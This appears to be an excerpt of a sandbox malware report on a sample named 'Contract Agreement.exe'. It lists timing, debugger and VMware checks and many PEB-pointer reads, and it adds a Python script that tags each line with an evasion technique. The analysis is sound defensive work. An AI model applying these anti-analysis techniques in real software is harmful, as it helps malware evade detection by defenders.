          Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 0000000002BA9B5E second address: 0000000002BA9B64 instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Contract Agreement.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 2864 | Thread sleep count: 39 > 30
          Source: C:\Windows\explorer.exe TID: 2864 | Thread sleep time: -78000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 4856 | Thread sleep time: -75000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000003.00000002.916677438.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.669272634.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.662962199.0000000004710000.00000004.00000001.sdmp | Binary or memory string: d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&f
          Source: explorer.exe, 00000003.00000002.917092318.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.662962199.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000003.00000002.916677438.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.669566755.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000003.00000002.916677438.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.669677507.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000003.00000002.916677438.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 0_2_6FC71000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
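The evasion lines above mix four different kinds of evidence and they do not carry equal weight. The two rdtsc reads bracketing xor ecx, ecx; add ecx, eax (the first reading is parked in ecx, the second is taken immediately after) are a timing check whose delta grows when rdtsc is trapped by a hypervisor or the code is single-stepped; the same check appears at 004098E4 in the sample and at 02BA98E4 in cmstp.exe. The DebugPort queries are the NtQueryInformationProcess(ProcessDebugPort) check, and the dropped DLL calls IsDebuggerPresent directly. The sample itself opens the VMware SATA CD-ROM device path. The VMware device names and Hyper-V error texts, by contrast, are found in explorer.exe memory dumps and are present on any VMware guest; they describe the environment, not something the sample did. The script below is an added example, not part of the report or of the sample: it parses lines in this format (with the source and event fused or separated), tags each with the technique it evidences, attributes it to a process, and keeps memory-string artefacts from processes other than the sample out of the technique table. The sample lines are copied from this section; the sample name parameter and the technique labels are the example's own.

```python
"""Tag Joe Sandbox-style signature lines with the evasion technique they evidence.
Added example for this page; not part of the report or of the sample."""
from __future__ import annotations
import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Iterable, Optional

# Labels the sandbox prints after the source column. Text exports often run the
# source and the label together ("...exeCode function:"), so the label is found
# by regex search rather than by a separator.
EVENT_LABELS = (
    "Code function:", "RDTSC instruction interceptor:", "Process queried:",
    "Process information queried:", "Binary or memory string:",
    "File opened / queried:", "Thread sleep time:", "Thread sleep count:",
    "Process created:", "User mode code has changed:", "Process information set:",
)
_LABEL_RE = re.compile("|".join(re.escape(lbl) for lbl in EVENT_LABELS))
_VM_RE = re.compile(r"vmware|necvmwar|hyper-v|virtual", re.IGNORECASE)

@dataclass
class Event:
    source: str   # process path, or "proc, dump-id.sdmp" for memory strings
    label: str
    detail: str

def parse_line(line: str) -> Optional[Event]:
    line = line.strip()
    m = _LABEL_RE.search(line) if line.startswith("Source:") else None
    if m is None:
        return None
    return Event(line[7:m.start()].strip(" |\t"), m.group(0), line[m.end():].strip())

def proc_name(source: str) -> str:
    # "C:\Windows\explorer.exe TID: 2864" and "explorer.exe, 00000003...sdmp" -> "explorer.exe"
    return re.split(r" TID:|, ", source, maxsplit=1)[0].rsplit("\\", 1)[-1]

def classify(ev: Event) -> Optional[str]:
    d, code = ev.detail, ev.label == "Code function:"
    if ev.label == "RDTSC instruction interceptor:" or (code and d.endswith(" rdtsc")):
        return "timing-check:rdtsc"
    if code and "fs:[00000030h]" in d:          # TEB+0x30 holds the PEB pointer
        return "anti-debug:peb-read"
    if code and "IsDebuggerPresent" in d:
        return "anti-debug:IsDebuggerPresent"
    if ev.label == "Process queried:" and d == "DebugPort":
        return "anti-debug:ProcessDebugPort"    # NtQueryInformationProcess(ProcessDebugPort)
    if ev.label.startswith("Thread sleep"):
        return "evasion:sleep"
    if ev.label == "File opened / queried:" and _VM_RE.search(d):
        return "vm-detect:device-query"
    if ev.label == "Binary or memory string:" and _VM_RE.search(d):
        return "vm-artifact:memory-string"
    if ev.label == "User mode code has changed:":
        return "hooking:inline-hook"
    return None

def triage(lines: Iterable[str], sample: str = "Contract Agreement.exe") -> dict:
    techniques: dict[str, set[str]] = defaultdict(set)
    peb_reads: Counter = Counter()
    noise: list[tuple[str, str]] = []
    for line in lines:
        ev = parse_line(line)
        tag = classify(ev) if ev else None
        if tag is None:
            continue
        proc = proc_name(ev.source)
        # VM strings in another process's memory describe the guest, not the
        # sample's behaviour; keep them out of the technique table.
        if tag == "vm-artifact:memory-string" and proc != sample:
            noise.append((proc, ev.detail))
            continue
        techniques[tag].add(proc)
        if tag == "anti-debug:peb-read":
            peb_reads[(proc, ev.detail.split()[0])] += 1
    return {"techniques": {k: sorted(v) for k, v in techniques.items()},
            "peb_reads": peb_reads, "environment_noise": noise}

# Constructed input: lines copied from this section, in both separator styles.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\Contract Agreement.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc",
    r"Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002BA98E4 second address: 0000000002BA98EA instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc",
    r"Source: C:\Users\user\Desktop\Contract Agreement.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}",
    r"Source: explorer.exe, 00000003.00000002.916677438.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.",
    r"Source: C:\Users\user\Desktop\Contract Agreement.exe | Process queried: DebugPort",
    r"Source: C:\Windows\SysWOW64\cmstp.exe | Process queried: DebugPort",
    r"Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 0_2_6FC71000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,",
    r"Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A590AF mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Windows\explorer.exe TID: 2864 | Thread sleep time: -78000s >= -30000s",
    r"Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00409A90 rdtsc",
]

if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for tag, procs in sorted(result["techniques"].items()):
        print(f"{tag:<32} {', '.join(procs)}")
    for (proc, func), n in result["peb_reads"].most_common():
        print(f"PEB read at {func} in {proc}: {n} hit(s)")
```

Run it over a saved text export of the report; the techniques table lists, per technique, the processes in which it was seen, and the per-function PEB-read counter is the compact form of the long run of fs:[00000030h] lines that follows this section.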
          Reads of the PEB pointer (fs:[00000030h]); repeated identical hits in the same function are collapsed, with the hit count in parentheses:
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 0_2_02B918A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 0_2_02B91688 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h] (6 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A4F0BF mov ecx, dword ptr fs:[00000030h]; mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A93884 mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A140E1 mov eax, dword ptr fs:[00000030h] (3 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A3B8E4 mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h] (5 hits); mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h] (4 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h] (5 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A3A830 mov eax, dword ptr fs:[00000030h] (4 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00AE4015 mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A97016 mov eax, dword ptr fs:[00000030h] (3 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00AE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00AD2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A30050 mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A461A0 mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00AD49A4 mov eax, dword ptr fs:[00000030h] (4 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h] (4 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A399BF mov ecx, dword ptr fs:[00000030h] (8 hits); mov eax, dword ptr fs:[00000030h] (4 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A1B1E1 mov eax, dword ptr fs:[00000030h] (3 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00AA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h] (4 hits); mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A4513A mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A19100 mov eax, dword ptr fs:[00000030h] (3 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A1B171 mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A3B944 mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h] (5 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A2AAB0 mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A4D294 mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00AD4AEF mov eax, dword ptr fs:[00000030h] (14 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A54A2C mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A3A229 mov eax, dword ptr fs:[00000030h] (9 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A15210 mov eax, dword ptr fs:[00000030h] (3 hits); mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A1AA16 mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00ADAA16 mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00ACB260 mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00AE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h] (4 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00ADEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00AA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A44BAD mov eax, dword ptr fs:[00000030h] (3 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00AE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00AD138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00ACD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A21B8F mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A42397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h] (6 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00AC23E3 mov ecx, dword ptr fs:[00000030h] (2 hits); mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A953CA mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A3A309 mov eax, dword ptr fs:[00000030h] (21 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00AD131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A43B7A mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00AE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD2D82 mov eax, dword ptr fs:[00000030h]
